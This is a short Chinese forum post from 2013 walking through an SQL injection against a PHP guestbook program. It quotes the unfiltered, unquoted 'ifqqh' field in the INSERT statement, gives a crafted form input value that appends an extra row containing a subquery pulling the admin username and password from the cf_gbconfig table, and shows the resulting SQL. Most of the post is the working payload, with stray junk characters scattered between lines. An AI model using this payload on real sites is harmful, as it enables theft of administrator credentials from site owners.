留言本注入。拿到帐号密码。前提知道程序源代码。在insert里面。构造了另外一句SQL。并且把帐号密码读出来。
9 A* p0 Y* H( b0 N5 N( q, G- I
$ifqqh=$_POST["ifqqh"];没有过滤。。。。。。。 G* r/ h* x" x$ B' ?! G
$sql=”insert into “.TABLE_PREFIX.”guestbook(username,email,content,userip,systime,ifshow,ifqqh)values(‘”.$username.”‘,’”.$email.”‘,’”.$content.”‘,’”.$userip.”‘,’”.$systime.”‘,”.$ifshow.”,”.$ifqqh.”)”;$ifqqh没有用 ‘ 来包含。不受magic_quotes_gpc影响
% r0 V3 h7 G6 y& Q% G- A( h: N, V& P9 N" |
提交的时候把ifqqh的值改一下。变成! M& z, P6 N- N: M2 K4 G4 ]3 ?# L
) o! o; w; v$ |6 A) e7 t<input type=”text” id=”ifqqh” name=”ifqqh” value=”1),(1,1,(SELECT concat(admin_user,0x2f,admin_pass) FROM cf_gbconfig),1,1,1,0″ />+ l* Q9 N3 S" c3 H6 Q4 D
R$ C ^& p) u9 @+ w5 X
这样SQL插入语句就变了.8 A/ X+ c+ d% |8 \8 o
( H! R4 C% y! _! t9 V! N
insert into cf_guestbook(username,email,content,userip,systime,ifshow,ifqqh)values(‘qqq’,”,’msgmsg’,’127.0.0.1′,’2012-12-22 19:07:23′,1,1),(1,1,(SELECT concat(admin_user,0x2f,admin_pass) FROM cf_gbconfig),1,now(),1,0)) ?. _% D5 e8 D' i* q# K3 E
C4 [- @1 U: }( i0 b; c
构造了另外一句SQL。并且把帐号密码读出来。
0 r0 E3 Z* ]9 Q; \' P- \" r2 p% R
|
发表于 2013-2-19 08:10:11
收藏
支持
反对